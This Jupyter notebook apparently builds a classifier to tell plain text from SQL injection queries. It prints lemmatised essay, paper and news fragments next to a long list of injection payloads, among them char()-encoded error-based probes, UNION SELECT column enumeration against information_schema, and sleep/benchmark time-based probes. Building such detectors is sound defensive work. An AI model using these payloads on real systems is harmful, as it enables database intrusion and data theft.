In [59]:
import nltk
import pandas as pd
import numpy as np

In [2]:
import keras

Using TensorFlow backend.

In [3]:
text=pd.read_csv("plain.txt",sep='\n',skiprows=2,header=None)
text.head()
text.rename(columns={0:'txt'},inplace=True)

In [4]:
text2=pd.read_csv("sql_querys.txt",sep='\n',header=None)

In [5]:
s1=list(text['txt'])
s2=list(text2[0])
s1=[i.lower() for i in s1]
s2=[i.lower() for i in s2]

In [6]:
y1=[0 for i in range(len(s1))]
y2=[1 for i in range(len(s2))]
y=y1+y2
print("{} - plain text {} - sql injection querys".format(len(s1),len(s2)))

3692 - plain text 5928 - sql injection querys

In [7]:
from nltk.stem import WordNetLemmatizer
word_lem=WordNetLemmatizer()

In [10]:
new_s1=[]
stopwords=nltk.corpus.stopwords.words("english")
for i in s1:
    temp=i.split(' ')
    temp1=[]
    for j in temp:

        j=j.strip(',').strip(r'["]').strip(';').strip('“').strip('”').strip(r'[.]+')
        j=j.replace("’",'')
        if j not in stopwords and j.isalpha():
            
            j=word_lem.lemmatize(j)
            temp1.append(j)

    new_s1.append(' '.join(temp1))
            
            
new_s1

['man star soul',
 'render honest perfect man',
 'command light influence fate',
 'nothing fall early late',
 'act angel good ill',
 'fatal shadow walk u still',
 'epilogue beaumont fletcher honest man fortune',
 'cast bantling rock',
 'suckle teat',
 'wintered hawk fox',
 'power speed hand foot',
 'read day verse written eminent painter',
 'original conventional soul always hears admonition',
 'line let subject may sentiment instil',
 'value thought may contain believe',
 'thought believe true private heart true',
 'men genius speak latent conviction shall',
 'universal sense inmost due time becomes outmost',
 'first thought rendered back u trumpet last',
 'judgment familiar voice mind highest merit',
 'ascribe moses plato milton set naught book',
 'tradition spoke men thought man',
 'learn detect watch gleam light flash across mind',
 'within lustre firmament bard sage yet',
 'dismisses without notice thought every work',
 'genius recognize rejected come back u',
 'certain alienated majesty great work art affecting lesson',
 'u teach u abide spontaneous impression',
 'inflexibility whole cry voice',
 'side else stranger say masterly good sense',
 'precisely thought felt time shall forced',
 'take shame opinion another',
 'time every man education arrives conviction',
 'envy ignorance imitation suicide must take',
 'better worse portion though wide universe full',
 'good kernel nourishing corn come toil',
 'bestowed plot ground given till power',
 'resides new nature none know',
 'know tried nothing one',
 'face one character one fact make much impression another',
 'none sculpture memory without preestablished harmony',
 'eye placed one ray fall might testify',
 'particular ray half express ashamed divine',
 'idea u represents may safely trusted proportionate',
 'good issue faithfully imparted god',
 'work made manifest coward man relieved gay',
 'put heart work done best said done',
 'otherwise shall give peace deliverance deliver',
 'attempt genius desert muse befriends invention',
 'hope',
 'trust every heart vibrates iron string accept place',
 'divine providence found society contemporary',
 'connection event great men always done confided',
 'childlike genius age betraying perception',
 'absolutely trustworthy seated heart working',
 'hand predominating men must',
 'accept highest mind transcendent destiny minor',
 'invalid protected corner coward fleeing revolution',
 'guide redeemer benefactor obeying almighty effort',
 'advancing chaos dark',
 'pretty oracle nature yield u text face behaviour',
 'child babe even divided rebel mind',
 'distrust sentiment arithmetic computed strength',
 'mean opposed purpose mind whole',
 'eye yet unconquered look face',
 'disconcerted infancy conforms conform one',
 'babe commonly make four five adult prattle play',
 'god armed youth puberty manhood le',
 'piquancy charm made enviable gracious claim',
 'put stand think youth force',
 'cannot speak next room voice',
 'sufficiently clear emphatic seems know speak',
 'contemporary bashful bold know make u senior',
 'unnecessary',
 'nonchalance boy sure dinner would disdain',
 'much lord say aught conciliate one healthy attitude',
 'human nature boy parlour pit playhouse',
 'independent irresponsible looking corner people',
 'fact pas try sentence merit swift',
 'summary way boy good bad interesting silly eloquent troublesome',
 'cumbers never consequence give',
 'independent genuine verdict must court court',
 'man clapped jail consciousness soon',
 'acted spoken eclat committed person watched',
 'sympathy hatred hundred whose affection must enter',
 'account lethe ah could pas',
 'thus avoid pledge observed',
 'observe unaffected unbiased unbribable unaffrighted',
 'innocence must always formidable would utter opinion passing',
 'affair seen private necessary would sink like dart',
 'ear men put fear',
 'voice hear solitude grow faint',
 'inaudible enter world society everywhere conspiracy',
 'manhood every one member society',
 'company member agree better securing bread',
 'shareholder surrender liberty culture eater',
 'virtue request conformity aversion love',
 'reality creator name custom',
 'whoso would man must nonconformist would gather',
 'immortal palm must hindered name goodness must',
 'explore goodness nothing last sacred integrity',
 'mind absolve shall suffrage',
 'world remember answer quite young prompted',
 'make valued adviser wont importune dear',
 'old doctrine church saying',
 'sacredness tradition live wholly friend suggested',
 'impulse may replied',
 'seem devil child live',
 'devil law sacred nature',
 'good bad name readily transferable',
 'right constitution wrong',
 'man carry presence opposition every',
 'thing titular ephemeral ashamed think easily',
 'capitulate badge name large society dead institution',
 'every decent individual affect sway',
 'right ought go upright vital speak rude truth',
 'way malice vanity wear coat philanthropy shall',
 'angry bigot assumes bountiful cause abolition come',
 'last news barbadoes say',
 'love thy infant love thy',
 'grace never varnish hard uncharitable ambition',
 'incredible tenderness black folk thousand mile thy love afar',
 'spite rough graceless would greeting truth',
 'handsomer affectation love goodness must edge',
 'else none doctrine hatred must preached',
 'counteraction doctrine love pules whine shun',
 'father mother wife brother genius call would',
 'write lintel whim hope somewhat better',
 'whim last cannot spend day explanation expect',
 'show cause seek exclude company',
 'tell good man obligation put poor men',
 'good situation tell thee thou foolish philanthropist',
 'grudge dollar dime cent give men',
 'belong belong class person',
 'spiritual affinity bought sold go',
 'prison need miscellaneous popular charity education',
 'college fool building vain end many',
 'stand alms sot thousandfold relief society though',
 'confess shame sometimes succumb give dollar wicked',
 'dollar shall manhood withhold',
 'virtue popular estimate rather exception rule',
 'man virtue men called good action',
 'piece courage charity much would pay fine expiation',
 'daily parade work done apology',
 'extenuation living world invalid insane pay',
 'high board virtue penance wish expiate live',
 'life spectacle much prefer',
 'lower strain genuine equal glittering',
 'unsteady wish sound sweet need diet',
 'bleeding ask primary evidence man refuse appeal',
 'man action know make difference',
 'whether forbear action reckoned excellent cannot',
 'consent pay privilege intrinsic right mean',
 'gift may actually need assurance',
 'assurance fellow secondary testimony',
 'must concern people think',
 'rule equally arduous actual intellectual life may serve whole',
 'distinction greatness meanness harder',
 'always find think know duty better',
 'know easy world live world opinion easy',
 'solitude live great man midst',
 'crowd keep perfect sweetness independence solitude',
 'objection conforming usage become dead',
 'scatter force loses time blur impression',
 'character maintain dead church contribute dead',
 'vote great party either government spread',
 'table like base housekeeper screen difficulty',
 'detect precise man course much force withdrawn',
 'proper life work shall know work',
 'shall reinforce man must consider',
 'game conformity know sect anticipate argument',
 'hear preacher announce text topic expediency one',
 'institution church know beforehand possibly',
 'say new spontaneous know',
 'ostentation examining ground institution',
 'know pledged look one',
 'side permitted side man parish',
 'retained attorney air bench emptiest affectation',
 'well men bound eye one another handkerchief',
 'attached one community opinion',
 'conformity make false particular author lie',
 'false particular every truth quite true two',
 'real two four real four every word say',
 'chagrin u know begin set right meantime',
 'nature slow equip u party',
 'adhere come wear one cut face figure acquire',
 'degree gentlest asinine expression mortifying experience',
 'particular fail wreak also general history',
 'mean foolish face forced smile put',
 'company feel ease answer conversation',
 'interest u muscle spontaneously moved moved low',
 'usurping wilfulness grow tight outline face',
 'disagreeable sensation',
 'nonconformity world whip displeasure therefore',
 'man must know estimate sour face look',
 'askance public street friend parlour aversation',
 'origin contempt resistance like might well',
 'go home sad countenance sour face multitude like',
 'sweet face deep cause put wind',
 'blow newspaper directs yet discontent multitude',
 'formidable senate college easy enough',
 'firm man know world brook rage cultivated class',
 'rage decorous prudent timid vulnerable',
 'feminine rage indignation people',
 'added ignorant poor aroused unintelligent',
 'brute force lie bottom society made growl mow',
 'need habit magnanimity religion treat godlike trifle',
 'concernment',
 'terror scare u consistency reverence',
 'past act word eye others data',
 'computing orbit past act loath disappoint',
 '',
 'keep head drag',
 'corpse memory lest contradict somewhat stated',
 'public suppose contradict',
 'seems rule wisdom never rely memory alone',
 'scarcely even act pure memory bring past judgment',
 'present live ever new day metaphysics',
 'denied personality yet devout motion',
 'soul come yield heart life though clothe god',
 'shape color leave theory joseph coat hand',
 'harlot flee',
 'foolish consistency hobgoblin little mind adored little',
 'statesman philosopher divine consistency great soul',
 'simply nothing may well concern shadow',
 'wall speak think hard word speak',
 'think hard word though contradict every thing',
 'said shall sure',
 'bad pythagoras misunderstood',
 'socrates jesus luther copernicus galileo newton',
 'every pure wise spirit ever took flesh great',
 'misunderstood',
 'suppose man violate nature sally',
 'rounded law inequality andes himmaleh',
 'insignificant curve sphere matter gauge',
 'try character like acrostic alexandrian stanza read',
 'forward backward across still spell thing pleasing',
 'contrite god allows let record day day honest',
 'thought without prospect retrospect cannot doubt found',
 'symmetrical though mean see book smell',
 'pine resound hum insect swallow window',
 'interweave thread straw carry bill web also',
 'pas character teach will men imagine',
 'communicate virtue vice overt action',
 'see virtue vice emit breath every moment',
 'agreement whatever variety action',
 'honest natural hour one action',
 'harmonious however unlike seem variety lost sight',
 'little distance little height thought one tendency unites',
 'voyage best ship zigzag line hundred tack see line',
 'sufficient distance straightens average tendency',
 'genuine action explain explain genuine',
 'action conformity explains nothing act singly',
 'already done singly justify greatness appeal future',
 'firm enough right scorn eye must done',
 'much right defend right',
 'always scorn appearance always may force character',
 'cumulative foregone day virtue work health',
 'make majesty hero senate field fill',
 'consciousness train great day victory',
 'behind shed united light advancing actor attended',
 'visible escort angel throw thunder chathams',
 'voice dignity washington port america adams eye',
 'honor venerable u ephemeris always ancient',
 'virtue worship love',
 'pay homage trap love homage selfdependent',
 'therefore old immaculate pedigree even',
 'shown young person',
 'hope day heard last conformity consistency',
 'let word gazetted ridiculous henceforward instead gong',
 'dinner let u hear whistle spartan fife let u never bow',
 'apologize great man coming eat house wish',
 'please wish wish please stand',
 'humanity though would make kind would make true let u',
 'affront reprimand smooth mediocrity squalid contentment',
 'time hurl face custom trade office fact',
 'upshot history great responsible thinker actor',
 'working wherever man work true man belongs time',
 'place centre thing nature measure',
 'men event ordinarily every body society reminds',
 'u somewhat else person character reality reminds',
 'nothing else take place whole creation man must',
 'much must make circumstance indifferent every true man',
 'cause country age requires infinite space number',
 'time fully accomplish design posterity seem follow step',
 'train client man caesar born age',
 'roman empire christ born million mind grow cleave',
 'genius confounded virtue possible man',
 'institution lengthened shadow one man monachism',
 'hermit antony reformation luther quakerism fox methodism',
 'wesley abolition clarkson scipio milton called height rome',
 'history resolve easily biography stout',
 'earnest person',
 'standard automatic speech recognizers output unstructured',
 'stream word neither perform',
 'proper segmentation output sentence',
 'predict punctuation symbol unavailable',
 'punctuation sentence boundary transcribed',
 'speech text create barrier many subsequent',
 'processing task summarization',
 'information extraction question answering',
 'machine translation thus segmentation',
 'long text necessary many real application',
 'example translation',
 'continuously transcribed speech text need',
 'segmented fed subsequent machine',
 'translation system et al',
 'nakamura current machine',
 'translation system perform translation',
 'sentence level various model',
 'used mt trained segmented sentence',
 'many algorithm inside mt exponential',
 'complexity regard length input',
 'punctuation prediction problem attracted',
 'research interest speech processing',
 'community natural language processing',
 'community previous work primarily',
 'exploit local feature statistical model',
 'lexicon prosodic cue hidden',
 'event language model et al',
 'matusov et al huang zweig',
 'stolcke shriberg model',
 'integrating local feature narrow view',
 'input could achieve satisfied',
 'performance due limited context information',
 'access et al naturally',
 'global context required model punctuation',
 'prediction especially dependency',
 'instance english question sentence',
 'ending question mark dependent',
 'initial phrase ng',
 'could figure',
 'work trying incorporate syntactic feature',
 'broaden view hypothesis punctuation',
 'prediction model et al favre',
 'et al method punctuation',
 'prediction treated separated',
 'parsing may suffer problem',
 'error propagation addition approach',
 'able incrementally process input',
 'efficient long input especially',
 'case long transcribed speech text',
 'presentation number streaming',
 'word could larger hundred thousand',
 'paper propose jointly performing',
 'punctuation prediction dependency',
 'parsing transcribed speech text',
 'parsing consumes',
 'stream word left right',
 'decoding algorithm punctuation symbol predicted',
 'word based context',
 'parsing tree two model proposed cause',
 'punctuation prediction interact',
 'transition action parsing one conduct',
 'transition action parsing followed punctuation',
 'prediction cascaded way',
 'associate conventional transition action',
 'parsing punctuation perdition predicted',
 'punctuation directly inferred',
 'parsing tree model linear complexity',
 'capable handling stream word',
 'length addition computation model',
 'use rich set syntactic feature improve',
 'complicated punctuation prediction',
 'global view especially long range',
 'dependency',
 'figure show example parsing',
 'help punctuation prediction transcribed',
 'speech text illustrated figure two',
 'comma predicted preceding word',
 'act adverbial modifier',
 'parsing period word menu predicted',
 'parsing adverbial clause',
 'modifier completed question mark',
 'end input determined direct',
 'object modifier identified together',
 'long range clue auxiliary word occurs',
 'nominal subject eventually',
 'two segmentation formed according',
 'punctuation prediction result shown figure',
 '',
 'training data used model adapted',
 'treebank data excluding punctuation',
 'keeping punctuation context',
 'simulate unavailable annotated transcribed',
 'speech text decoding beam search used',
 'get optimal punctuation prediction result',
 'conduct experiment iwslt data',
 'test data set experimental result',
 'show method achieve higher performance',
 'baseline method',
 'paper structured section',
 'conduct survey related work transitionbased',
 'dependency parsing introduced section',
 'explain approach predicting punctuation',
 'transcribed speech text section',
 'section give result experiment',
 'conclusion future work given section',
 'sentence boundary detection punctuation prediction',
 'extensively studied',
 'speech processing field attracted research',
 'interest natural language processing',
 'field well previous work exploit local',
 'feature task kim woodland',
 'huang zweig christensen et al',
 'liu et al integrate prosodic',
 'feature pause duration lexical',
 'feature predict',
 'punctuation symbol speech recognition',
 'huang zweig us maximum',
 'entropy model christensen et al focus',
 'finite state perceptron method',
 'liu et al us conditional random',
 'field however scenario prosodic',
 'cue available due inaccessible original',
 'raw speech waveform matusov et al integrate',
 'segmentation feature',
 'model statistical machine translation',
 'framework improve translation performance',
 'translating transcribed speech text',
 'lu ng us dynamic conditional random',
 'field perform sentence boundary',
 'sentence type prediction achieved promising',
 'result english chinese transcribed',
 'speech text work exploit local feature limited capturing',
 'long range dependency punctuation',
 'prediction',
 'natural incorporate global knowledge',
 'syntactic information improve punctuation',
 'prediction performance roark et al',
 'use rich set feature including parser',
 'score full segmentation favre et',
 'al integrate syntactic information',
 'pcfg parser combine',
 'local feature sentence segmentation',
 'punctuation prediction work performed',
 'step parsing',
 'parse tree need built advance',
 'parsing stream word transcribed',
 'speech text exponentially complex approach',
 'feasible short input processing',
 'unlike work incorporate punctuation',
 'prediction parsing process',
 'left right input without length limitation',
 'numerous dependency parsing algorithm',
 'proposed natural language processing',
 'community including',
 'dependency parsing compared',
 'parsing parsing',
 'offer linear time complexity easily leverage',
 'feature model',
 'matsumoto nivre et al zhang',
 'clark huang sagae starting',
 'work nivre',
 'paper extend dependency',
 'parsing stream',
 'word integrate parsing punctuation',
 'prediction',
 'joint po tagging dependency',
 'parsing studied et al',
 'bohnet nivre improvement',
 'reported joint model compared',
 'pipeline model chinese richly',
 'inflected language show also',
 'make sense jointly perform punctuation prediction',
 'parsing although two task',
 'po tagging punctuation prediction different',
 'two former usually work',
 'single sentence latter',
 'need process multiple sentence',
 'lengthy po tag feature',
 'parsing punctuation parsing',
 'quality former sensitive performance',
 'entire task latter',
 'orlando bloom miranda kerr still love',
 'actor orlando bloom model miranda kerr want go separate way',
 'however interview bloom said kerr still love',
 'miranda kerr orlando bloom parent flynn',
 'actor orlando bloom announced separation wife supermodel miranda kerr',
 'interview u journalist katie couric broadcast friday bloom said sometimes life go exactly plan hope',
 'kerr still love emphasised',
 'going support one another love parent flynn',
 'kerr bloom married since son flynn born',
 'jet maker feud seat width big order stake',

In [11]:
new_s2=[]
for i in s2:
    temp=i.split(' ')
    temp1=[]
    for j in temp:
        if j not in stopwords:
            
            j=word_lem.lemmatize(j)
            temp1.append(j)

    new_s2.append(' '.join(temp1))
            
            
new_s2

['59)) 3233 (select (char(113)+char(98)+char(98)+char(106)+char(113)+(select (case (3233=3233) char(49) else char(48) end))+char(113)+char(112)+char(118)+char(122)+char(113))) ((7797=7797',
 '59)) 5376=convert(int,(select char(113)+char(98)+char(98)+char(106)+char(113)+(select (case (5376=5376) char(49) else char(48) end))+char(113)+char(112)+char(118)+char(122)+char(113))) ((8738=8738',
 '59")) 5376=convert(int,(select char(113)+char(98)+char(98)+char(106)+char(113)+(select (case (5376=5376) char(49) else char(48) end))+char(113)+char(112)+char(118)+char(122)+char(113))) (("imxw"="imxw',
 '59 6623=concat(char(113)+char(98)+char(98)+char(106)+char(113),(select (case (6623=6623) char(49) else char(48) end)),char(113)+char(112)+char(118)+char(122)+char(113))-- caqc',
 '288 && 1=2 union select  1,2,3,concat(char(91,88,93),count(*),char(91,88,93)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 information_schema.columns `column_name` like char(37,115,111,99,105,97,108,95,115,101,99,117,114,105,116,121,95,110,117,109,98,101,114,37) && ( data_type=char(99,104,97,114) ||data_type=char(118,97,114,99,104,97,114) ||data_type=char(116,101,120,116)) #',
 '288 && 1=2 union select 1,2,3,concat(char(91,88,93),count(*),char(91,88,93)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 information_schema.columns `column_name` like char(37,115,111,99,105,97,108,45,115,101,99,117,114,105,116,121,45,110,117,109,98,101,114,37) && ( data_type=char(99,104,97,114) ||data_type=char(118,97,114,99,104,97,114) ||data_type=char(116,101,120,116)) #',
 '211111111111111111111111111 union select concat(char(100,100,100),char(91,88,93),column_name,char(91,88,88,93)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 information_schema.columns  `table_name`=char(105,100,95,111,110,108,105,110,101) `table_schema`=char(110,97,98,97,107,101,109) `column_name` like char(37,112,104,111,110,37)  limit 0,1 --',
 ' 3201=benchmark(5000000,md5(0x4e554353))',
 ' 6646=benchmark(5000000,md5(0x4f674372))#',
 ' 211111111111111111111111111 union select concat(char(100,100,100),char(91,67,79,76,85,77,78,95,78,65,77,69,93),column_name,char(91,67,79,76,85,77,78,95,78,65,77,69,93),char(91,84,65,66,76,69,95,78,65,77,69,93),table_name,char(91,84,65,66,76,69,95,78,65,77,69,93),char(91,84,65,66,76,69,95,83,67,72,69,77,65,93),table_schema,char(91,84,65,66,76,69,95,83,67,72,69,77,65,93)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 information_schema.columns `column_name` like char(37,109,97,105,108,37) ( `data_type`=char(99,104,97,114) `data_type`=char(118,97,114,99,104,97,114) `data_type`=char(116,101,120,116))  limit 4,1 --',
 ' row(4115,7844)>(select count(*),concat(0x717a786271,(select (elt(4115=4115,1))),0x7176767871,floor(rand(0)*2))x (select 9757 union select 8982 union select 5308 union select 5233)a group x)',
 ' sleep(5)',
 ' sleep(5)#',
 ' 2 benchmark(2999999,md5(now()))',
 ' 292_f1_890.pdf',
 " 292_f1_890.pdf'&&benchmark(2999999,md5(now()))&&'1",
 ' 4263=benchmark(5000000,md5(0x517a7044))#',
 ' 9738=benchmark(5000000,md5(0x5a7a584d))',
 ' row(5565,7011)>(select count(*),concat(0x717a786271,(select (elt(5565=5565,1))),0x7176767871,floor(rand(0)*2))x (select 8025 union select 2135 union select 1291 union select 2570)a group x)',
 ' sleep(5)',
 ' sleep(5)#',
 ' procedure analyse(extractvalue(2799,concat(0x5c,(benchmark(5000000,md5(0x41415763))))),1)#',
 ' procedure analyse(extractvalue(3220,concat(0x5c,0x717a786271,(select (case (3220=3220) 1 else 0 end)),0x7176767871)),1)',
 ' procedure analyse(extractvalue(3695,concat(0x5c,(benchmark(5000000,md5(0x50477a4b))))),1)',
 ' union select null#',
 ' union select null,null#',
 ' union select null,null,null#',
 ' union select null,null,null,null#',
 ' union select null,null,null,null,null#',
 ' union select null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 '1001111111111111 union select char(45,120,49,45,81,45),char(45,120,50,45,81,45),char(45,120,51,45,81,45),char(45,120,52,45,81,45),char(45,120,53,45,81,45),char(45,120,54,45,81,45),char(45,120,55,45,81,45),char(45,120,56,45,81,45),char(45,120,57,45,81,45),char(45,120,49,48,45,81,45),char(45,120,49,49,45,81,45),char(45,120,49,50,45,81,45),char(45,120,49,51,45,81,45),char(45,120,49,52,45,81,45) --  /*',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
 ' union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#',
